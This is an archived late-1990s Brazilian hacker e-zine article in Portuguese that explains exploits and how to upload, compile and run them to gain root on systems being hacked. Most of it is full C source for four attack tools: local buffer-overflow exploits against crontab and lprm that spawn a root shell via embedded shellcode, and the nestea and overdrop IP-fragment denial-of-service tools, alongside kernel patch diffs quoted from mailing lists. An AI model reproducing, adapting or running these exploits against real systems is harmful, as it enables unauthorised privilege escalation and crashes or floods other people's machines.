ZINES — underground e-zine archive source
text size: CRT glow:
~/BRAZILIAN/FW/03/FW #03-01
<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>
                                                                
                    1***********   Xploit[]'s   ***********1

           1-INTRODUÇAO :

           Recentemente há uma grande dúvida ainda sobre os taos falados
           exploits.
           Muita gente ainda nao sabe direito o que sao, o que fazem, como
           usar, porque sao tao procurados.
           Entao nesse texto vamos tentar tirar essas duvidas.

           2-O que é um exploit :

           Simplificando a explicaçao, um exploit é um programa que "explora"
           um bug em um software especifico. Todos os exploits sao diferentes,
           eles fazem coisas diferentes e exploram bugs diferentes nos
           sistemas. Por isso um exploit é sempre um programa especifico.
           Foram feitos pra te dar acesso root em diferentes sistemas. Eles
           conseguem isso explorando um bug em um software quando ele esta
           rodando como root.

           3-Como eu uso um exploit :

           Desde que os exploits sao escritos em C em 99% das vezes, você
           vai precisar de uma shell na box em que voce for usar o exploit,
           ou, você precisa estar usando o mesmo sistema operacional da box
           que você está tentando hackear. Entao, basicamente você precisa
           colocar o codigo do source ou o binario no diretório acconts da
           sua shell. Para colocar isso na sua shell voce pode entrar via
           ftp e fazer upload dos desse jeito ou voce pode usar rz se você
           tiver usando uma shell dialup.

           Já que voce tem agora o exploit na box voce só precisa compilar!
           Normalmente se compila o exploit como isso :
           
           blah:~/$gcc exploit.c

           Isso deve compilar seu exploit. De qualquer forma fique atento
           porque tem alguns exploits que sao sacanagens, pra pegar gente que
           nao manja de C.
           Depois de compilar o exploit está pronto. Rode o exploit que seu
           trabalho será feito!

           3-Onde posso pegar exploits.

           Dois sites bem legais sÒo esses :

           http://get.your.exploits.com

           http://www.rootshell.com

           Bom, acho que já falei o básico dos exploits. Pelo menos voces já
           tem uma noçaozinha do que sao e o que fazem essas maravilhas.
           Espero que tenhamos esclarecido algumas duvidas.

           Agora mais exploit[]'Z

           Exploit do overflow no LINUX BY Dave G.

-------------------------------Corta

/*
 *
 * Dave G.
 * <daveg@escape.com>
 * http://www.escape.com/~daveg
 *
 *
 */

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

#define DEFAULT_OFFSET          -1240
#define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE              "./Window"

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
   int fd;
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";



/*
 * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
 * a '=' character appears below
 */


   int i;
   int ofs = DEFAULT_OFFSET;

   /* if we have a argument, use it as offset, else use default */
   if(argc == 2)
      ofs = atoi(argv[1]);
   else if (argc > 2) {
      fprintf(stderr, "egg [offset]\n");
      exit(-1);
   }
   /* print the offset in use */
   printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   /* fill start of buffer with nops */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* stick asm code into the buffer */
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (878/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr++ = '=';
   *ptr++ = 'X';
   *ptr++ = '\n';
   *ptr = 0;
   printf("Writing to %s\n", HAPPY_FILE);

   fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
   write (fd, buff, strlen(buff));

   close(fd);

   execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL);
   /* Successful completion */
   exit(0);
}

-----------------------------------Corta

------------------------------------------------------------------------------

           Outro clássico overflow em Linux 4.2 BY Chris Evans

-------------------------------------Corta

/* lprm.c
*
* 
*
* Exploit bug descoberto por Chris Evans no Linux lprm.
*/

#include <stdio.h>
#define PRINTER "-Pwhatever"


static inline getesp() {
  __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv) {
  int i,j,buffer,offset;
  long unsigned esp;
  char unsigned buf[4096];

  unsigned char
  shellcode[]="\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c" 
             "\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh";

  buffer=990;
  offset=3000;
 
  if (argc>1)buffer=atoi(argv[1]);   
  if (argc>2)offset=atoi(argv[2]);   


  for (i=0;i<buffer;i++)
     buf[i]=0x41;  /* inc ecx */

  j=0;

  for (i=buffer;i<buffer+strlen(shellcode);i++)
      buf[i]=shellcode[j++];

  esp=getesp()+offset;

  buf[i]=esp & 0xFF;
  buf[i+1]=(esp >> 8) & 0xFF;
  buf[i+2]=(esp >> 16) & 0xFF;
  buf[i+3]=(esp >> 24) & 0xFF;

  buf[i+4]=esp & 0xFF; 
  buf[i+5]=(esp >> 8) & 0xFF;
  buf[i+6]=(esp >> 16) & 0xFF;
  buf[i+7]=(esp >> 24) & 0xFF;

  printf("Offset: 0x%x\n\n",esp);

  execl("/usr/bin/lprm","lprm",PRINTER,buf,NULL);
}

----------------------------------------------------Corta

------------------------------------------------------------------------------

           Bug do IP em Linux 2.0.33 BY Alan Cox

-------------------------------------------------Corta

Date:         Thu, 16 Apr 1998 15:09:56 +0100
Reply-To:     Alan Cox <alan@CYMRU.NET>
Subject:      Linux 2.0.33 vulnerability: fragment patterns

Ok duplicated. There's an 'off by one IP header' bug

--- ip_fragment.c.old   Thu Apr 16 12:25:34 1998
+++ ip_fragment.c       Thu Apr 16 12:29:02 1998
@@ -375,7 +375,7 @@
        fp = qp->fragments;
        while(fp != NULL)
        {
-               if (fp->len < 0 || count+fp->len > skb->len)
+               if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)
                {
                        NETDEBUG(printk("Invalid fragment list: Fragment over size.\n"));
                        ip_free(qp);


------------------------------------------------------------------

//
// 
//

// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.*  and some windows boxes
// this code is a total rip of teardrop - it's messy
// hi sygma

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

// bsd usage is currently broken because of socket options on the third sendto

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256    /* datagram frame padding for first packet */
#define COUNT   500    /* we are overwriting a small number of bytes we 
			shouldnt have access to in the kernel. 
			to be safe, we should hit them till they die :>  */

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;


    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    byte = 0x4F;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 44;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

	for(i=0;i<PADDING;i++)
	{
		p_ptr[i++]=random()%255;
	}	

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

-----------------------------------------------Corta

------------------------------------------------------------------------------

          Ovedrop em Linux 2.0.33 BY Michal Zalewski

----------------------------------------------------------Corta

From lcamtuf@boss.staszic.waw.pl Sat Apr 18 09:06:58 1998
Date: Sat, 18 Apr 1998 11:48:33 +0200 (CEST)
From: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
Subject: ip_fragment.c - printk() problem.

Here's a DoS exploit against Linux 2.0.33... It doesn't crash
anything, but it's very annoying ;)

Fix:

--- ip_fragment.c.orig  Fri Apr 17 16:42:38 1998
+++ ip_fragment.c       Fri Apr 17 17:17:15 1998
@@ -345,7 +345,7 @@

        if(len>65535)
        {
-               printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+               NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
                ip_statistics.IpReasmFails++;
                ip_free(qp);
                return NULL;

-------------------------------------------------------------------------

// 

// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#define IP_MF	0x2000
#define IPH	0x14
#define UDPH	0x8
#define PADDING	0x1c
#define MAGIC	0x3
#define COUNT	0xBEEF
#define FRAG2	0xFFFF

void usage(char *name) {
  fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);
  exit(0);
}

u_long name_resolve(char *host_name) {
  struct in_addr addr;
  struct hostent *host_ent;
  if ((addr.s_addr=inet_addr(host_name))==-1) {
    if (!(host_ent=gethostbyname(host_name))) return (0);
    bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
  }
  return (addr.s_addr);
}


void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
  u_char *packet=NULL,*p_ptr=NULL;
  u_char byte;
  struct sockaddr_in sin;
  sin.sin_family=AF_INET;
  sin.sin_port=src_prt;
  sin.sin_addr.s_addr=dst_ip;
  packet=(u_char *)malloc(IPH+UDPH+PADDING);
  p_ptr=packet;
  bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
  byte=0x45;
  memcpy(p_ptr,&byte,sizeof(u_char));
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(242);
  p_ptr+=2;
  *((u_short *)p_ptr)|=htons(IP_MF);
  p_ptr+=2;
  *((u_short *)p_ptr)=0x40;
  byte=IPPROTO_UDP;
  memcpy(p_ptr+1,&byte,sizeof(u_char));
  p_ptr+=4;
  *((u_long *)p_ptr)=src_ip;
  p_ptr+=4;
  *((u_long *)p_ptr)=dst_ip;
  p_ptr+=4;
  *((u_short *)p_ptr)=htons(src_prt);
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(dst_prt);
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(8+PADDING);
  if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
      sizeof(struct sockaddr))==-1) {
    perror("\nsendto");
    free(packet);
    exit(1);
  }
  p_ptr=&packet[2];
  *((u_short *)p_ptr)=htons(IPH+MAGIC+1);
  p_ptr+=4;
  *((u_short *)p_ptr)=htons(FRAG2);
  if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
      sizeof(struct sockaddr))==-1) {
    perror("\nsendto");
    free(packet);
    exit(1);
  }
  free(packet);
}


int main(int argc, char **argv) {
  int one=1,count=0,i,rip_sock,lag=500;
  u_long  src_ip=0,dst_ip=0;
  u_short src_prt=0,dst_prt=0;
  struct in_addr addr;
  fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
  if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
    perror("raw socket");
    exit(1);
  }
  if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
    perror("IP_HDRINCL");
    exit(1);
  }
  if (argc < 2) usage(argv[0]);
  if (!(dst_ip=name_resolve(argv[1]))) {
    fprintf(stderr,"Can't resolve destination address.\n");
    exit(1);
  }
  while ((i=getopt(argc,argv,"s:n:x"))!=EOF) {
    switch (i) {
      case 'n':
        count   = atoi(optarg);
        break;
      case 's':
        if (!(src_ip=name_resolve(optarg))) {
          fprintf(stderr,"Can't resolve source address.\n");
          exit(1);
        }
	break;
      case 'x':
        lag=0;
        break;
      default:
        usage(argv[0]);
        break;
    }
  }
  srandom((unsigned)(time((time_t)0)));
  if (!count) count=COUNT;
  fprintf(stderr,"Sending oversized packets:\nFrom: ");
  if (!src_ip) fprintf(stderr,"       (random)"); else {
    addr.s_addr = src_ip;
    fprintf(stderr,"%15s",inet_ntoa(addr));
  }
  addr.s_addr = dst_ip;
  fprintf(stderr,"\n  To: %15s\n",inet_ntoa(addr));
  fprintf(stderr," Amt: %5d\n",count);
  fprintf(stderr,"[ ");
  for (i=0;i<count;i++) {
    if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
      send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
    fprintf(stderr, "b00z ");
    usleep(lag);
  }
  fprintf(stderr, "]\n");
  return (0);
}

-------------------------------Corta

------------------------------------------------------------------------------

<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>